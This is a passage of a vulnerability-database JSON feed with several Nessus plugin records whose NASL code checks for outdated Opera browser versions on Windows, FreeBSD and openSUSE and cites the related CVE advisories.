{"lastseen": "2021-01-01T04:33:27", "description": "The version of Opera installed on the remote host is earlier than 9.63\nand thus reportedly affected by several issues :\n\n - It may be possible to execute arbitrary code on the\n remote system by manipulating certain text-area \n contents. (920)\n\n - It may be possible to crash the remote browser using \n certain HTML constructs or inject code under certain \n conditions. (921)\n\n - It may be possible to trigger a buffer overflow, and\n potentially execute arbitrary code, by tricking an \n user to click on a URL that contains exceptionally \n long host names. (922)\n\n - While previewing news feeds, Opera does not correctly\n block certain scripted URLs. Such scripts, if not \n blocked, may be able to subscribe a user to other \n arbitrary feeds and view contents of the feeds to which\n the user is currently subscribed. (923)\n\n - By displaying content using XSLT as escaped strings, it \n may be possible for a website to inject scripted\n markup. (924)\n\n - SSL server certificates are not properly validated due\n to an unspecified error. (CVE-2012-1251)", "edition": 24, "published": "2008-12-16T00:00:00", "title": "Opera < 9.63 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1251", "CVE-2008-5178"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:opera:opera_browser"], "id": "OPERA_963.NASL", "href": "https://www.tenable.com/plugins/nessus/35185", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35185);\n script_version(\"1.14\");\n\n script_cve_id(\"CVE-2008-5178\", \"CVE-2012-1251\");\n script_bugtraq_id(32323, 32864, 32891);\n\n script_name(english:\"Opera < 9.63 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version number of Opera\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web browser that is affected by several\nissues.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The version of Opera installed on the remote host is earlier than 9.63\nand thus reportedly affected by several issues :\n\n - It may be possible to execute arbitrary code on the\n remote system by manipulating certain text-area \n contents. (920)\n\n - It may be possible to crash the remote browser using \n certain HTML constructs or inject code under certain \n conditions. (921)\n\n - It may be possible to trigger a buffer overflow, and\n potentially execute arbitrary code, by tricking an \n user to click on a URL that contains exceptionally \n long host names. (922)\n\n - While previewing news feeds, Opera does not correctly\n block certain scripted URLs. Such scripts, if not \n blocked, may be able to subscribe a user to other \n arbitrary feeds and view contents of the feeds to which\n the user is currently subscribed. (923)\n\n - By displaying content using XSLT as escaped strings, it \n may be possible for a website to inject scripted\n markup. (924)\n\n - SSL server certificates are not properly validated due\n to an unspecified error. (CVE-2012-1251)\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://web.archive.org/web/20130225211806/http://www.opera.com/support/kb/view/920/\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://web.archive.org/web/20130225215248/http://www.opera.com/support/kb/view/921/\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://web.archive.org/web/20130225211810/http://www.opera.com/support/kb/view/922/\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://web.archive.org/web/20130225215251/http://www.opera.com/support/kb/view/923/\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://web.archive.org/web/20130225221045/http://www.opera.com/support/kb/view/924/\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://web.archive.org/web/20170812134941/http://www.opera.com:80/docs/changelogs/windows/963/\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://jvn.jp/en/jp/JVN39707339/index.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Opera 9.63 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/12/16\");\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/a:opera:opera_browser\");\nscript_end_attributes();\n\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"opera_installed.nasl\");\n script_require_keys(\"SMB/Opera/Version\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\n\nversion_ui = get_kb_item(\"SMB/Opera/Version_UI\");\nversion = get_kb_item(\"SMB/Opera/Version\");\nif (isnull(version)) exit(0);\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif (\n ver[0] < 9 ||\n (\n ver[0] == 9 &&\n (\n ver[1] < 63\n )\n )\n)\n{\n if (report_verbosity && version_ui)\n {\n report = string(\n \"\\n\",\n \"Opera \", version_ui, \" is currently installed on the remote host.\\n\"\n );\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:47:01", "description": "Opera Team reports :\n\nAn unspecified error in the processing of JPEG images can be exploited\nto trigger a memory corruption.\n\nAn error can be exploited to execute arbitrary script code in a\ndifferent domain via unspecified plugins.\n\nAn unspecified error has a 'moderately severe' impact. No further\ninformation is available.", "edition": 26, "published": "2009-03-16T00:00:00", "title": "FreeBSD : opera -- multiple vulnerabilities (8c5205b4-11a0-11de-a964-0030843d3802)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0915", "CVE-2009-0914"], "modified": "2009-03-16T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:linux-opera", "p-cpe:/a:freebsd:freebsd:opera"], "id": "FREEBSD_PKG_8C5205B411A011DEA9640030843D3802.NASL", "href": "https://www.tenable.com/plugins/nessus/35928", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35928);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-0914\", \"CVE-2009-0915\");\n script_xref(name:\"Secunia\", value:\"34135\");\n\n script_name(english:\"FreeBSD : opera -- multiple vulnerabilities (8c5205b4-11a0-11de-a964-0030843d3802)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Opera Team reports :\n\nAn unspecified error in the processing of JPEG images can be exploited\nto trigger a memory corruption.\n\nAn error can be exploited to execute arbitrary script code in a\ndifferent domain via unspecified plugins.\n\nAn unspecified error has a 'moderately severe' impact. No further\ninformation is available.\"\n );\n # http://www.opera.com/docs/changelogs/freebsd/964/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://help.opera.com/en/latest/\"\n );\n # https://vuxml.freebsd.org/freebsd/8c5205b4-11a0-11de-a964-0030843d3802.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2f26ef60\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-opera\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:opera\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/03/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/03/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"opera<9.64\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-opera<9.64\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T04:33:28", "description": "The version of Opera installed on the remote host is earlier than 9.64\nand thus reportedly affected by multiple issues :\n\n - A memory-corruption vulnerability when processing specially\n crafted JPEG files could allow an attacker to execute arbitrary\n code with the privileges of the affected application. (926)\n \n - It may be possible for certain plugins to execute arbitrary code\n in the context of a different domain. An attacker could exploit\n this to steal authentication credentials as well as carry out\n other attacks.", "edition": 24, "published": "2009-03-03T00:00:00", "title": "Opera < 9.64 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0915", "CVE-2009-0916", "CVE-2009-0914"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:opera:opera_browser"], "id": "OPERA_964.NASL", "href": "https://www.tenable.com/plugins/nessus/35761", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35761);\n script_version(\"1.14\");\n\n script_cve_id(\n \"CVE-2009-0914\",\n \"CVE-2009-0915\",\n \"CVE-2009-0916\"\n );\n script_bugtraq_id(33961);\n\n script_name(english:\"Opera < 9.64 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version number of Opera\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web browser that is affected by multiple\nissues.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The version of Opera installed on the remote host is earlier than 9.64\nand thus reportedly affected by multiple issues :\n\n - A memory-corruption vulnerability when processing specially\n crafted JPEG files could allow an attacker to execute arbitrary\n code with the privileges of the affected application. (926)\n \n - It may be possible for certain plugins to execute arbitrary code\n in the context of a different domain. An attacker could exploit\n this to steal authentication credentials as well as carry out\n other attacks.\");\n \n script_set_attribute(attribute:\"see_also\", value:\"http://web.archive.org/web/20170921133116/http://www.opera.com/docs/changelogs/windows/964/\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://web.archive.org/web/20130225221001/http://www.opera.com/support/kb/view/926/\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Opera 9.64 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2009/03/03\");\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/a:opera:opera_browser\");\nscript_end_attributes();\n\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"opera_installed.nasl\");\n script_require_keys(\"SMB/Opera/Version\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\n\nversion_ui = get_kb_item(\"SMB/Opera/Version_UI\");\nversion = get_kb_item(\"SMB/Opera/Version\");\nif (isnull(version)) exit(0);\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif (\n ver[0] < 9 ||\n (\n ver[0] == 9 &&\n (\n ver[1] < 64\n )\n )\n)\n{\n if (report_verbosity && version_ui)\n {\n report = string(\n \"\\n\",\n \"Opera \", version_ui, \" is currently installed on the remote host.\\n\"\n );\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:51:39", "description": "Opera 9.64 is a recommended security and stability upgrade,\nincorporating the Opera Presto 2.1.1 user agent engine. Opera highly\nrecommends all users to upgrade to Opera 9.64 to take advantage of\nthese improvements (CVE-2009-0914, CVE-2009-0915, CVE-2009-0916).\n\nA detailed changelog can be found at\nhttp://www.opera.com/docs/changelogs/linux/964/", "edition": 23, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : opera (opera-629)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0915", "CVE-2009-0916", "CVE-2009-0914"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:opera", "cpe:/o:novell:opensuse:11.0"], "id": "SUSE_11_0_OPERA-090317.NASL", "href": "https://www.tenable.com/plugins/nessus/40095", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update opera-629.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40095);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/10/25 13:36:34\");\n\n script_cve_id(\"CVE-2009-0914\", \"CVE-2009-0915\", \"CVE-2009-0916\");\n\n script_name(english:\"openSUSE Security Update : opera (opera-629)\");\n script_summary(english:\"Check for the opera-629 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Opera 9.64 is a recommended security and stability upgrade,\nincorporating the Opera Presto 2.1.1 user agent engine. Opera highly\nrecommends all users to upgrade to Opera 9.64 to take advantage of\nthese improvements (CVE-2009-0914, CVE-2009-0915, CVE-2009-0916).\n\nA detailed changelog can be found at\nhttp://www.opera.com/docs/changelogs/linux/964/\"\n );\n # http://www.opera.com/docs/changelogs/linux/964/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://help.opera.com/en/latest/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=481892\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected opera package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:opera\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"opera-9.64-1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"opera\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:52:53", "description": "Opera 9.64 is a recommended security and stability upgrade,\nincorporating the Opera Presto 2.1.1 user agent engine. Opera highly\nrecommends all users to upgrade to Opera 9.64 to take advantage of\nthese improvements (CVE-2009-0914, CVE-2009-0915, CVE-2009-0916).\n\nA detailed changelog can be found at\nhttp://www.opera.com/docs/changelogs/linux/964/", "edition": 23, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : opera (opera-629)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0915", "CVE-2009-0916", "CVE-2009-0914"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:opera", "cpe:/o:novell:opensuse:11.1"], "id": "SUSE_11_1_OPERA-090317.NASL", "href": "https://www.tenable.com/plugins/nessus/40290", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update opera-629.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40290);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/10/25 13:36:35\");\n\n script_cve_id(\"CVE-2009-0914\", \"CVE-2009-0915\", \"CVE-2009-0916\");\n\n script_name(english:\"openSUSE Security Update : opera (opera-629)\");\n script_summary(english:\"Check for the opera-629 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Opera 9.64 is a recommended security and stability upgrade,\nincorporating the Opera Presto 2.1.1 user agent engine. Opera highly\nrecommends all users to upgrade to Opera 9.64 to take advantage of\nthese improvements (CVE-2009-0914, CVE-2009-0915, CVE-2009-0916).\n\nA detailed changelog can be found at\nhttp://www.opera.com/docs/changelogs/linux/964/\"\n );\n # http://www.opera.com/docs/changelogs/linux/964/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://help.opera.com/en/latest/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=481892\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected opera package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:opera\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"opera-9.64-1.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"opera\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:32:59", "description": "Opera 9.64 is a recommended security and stability upgrade,\nincorporating the Opera Presto 2.1.1 user agent engine. Opera highly\nrecommends all users to upgrade to Opera 9.64 to take advantage of\nthese improvements (CVE-2009-0914, CVE-2009-0915, CVE-2009-0916).\n\nA detailed changelog can be found at\nhttp://www.opera.com/docs/changelogs/linux/964/", "edition": 22, "published": "2009-03-18T00:00:00", "title": "openSUSE 10 Security Update : opera (opera-6094)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0915", "CVE-2009-0916", "CVE-2009-0914"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:opera", "cpe:/o:novell:opensuse:10.3"], "id": "SUSE_OPERA-6094.NASL", "href": "https://www.tenable.com/plugins/nessus/35957", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update opera-6094.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35957);\n script_version (\"1.9\");\n script_cvs_date(\"Date: 2019/10/25 13:36:37\");\n\n script_cve_id(\"CVE-2009-0914\", \"CVE-2009-0915\", \"CVE-2009-0916\");\n\n script_name(english:\"openSUSE 10 Security Update : opera (opera-6094)\");\n script_summary(english:\"Check for the opera-6094 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Opera 9.64 is a recommended security and stability upgrade,\nincorporating the Opera Presto 2.1.1 user agent engine. Opera highly\nrecommends all users to upgrade to Opera 9.64 to take advantage of\nthese improvements (CVE-2009-0914, CVE-2009-0915, CVE-2009-0916).\n\nA detailed changelog can be found at\nhttp://www.opera.com/docs/changelogs/linux/964/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.opera.com/docs/changelogs/linux/964/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected opera package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:opera\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.3\", reference:\"opera-9.64-1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"opera\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}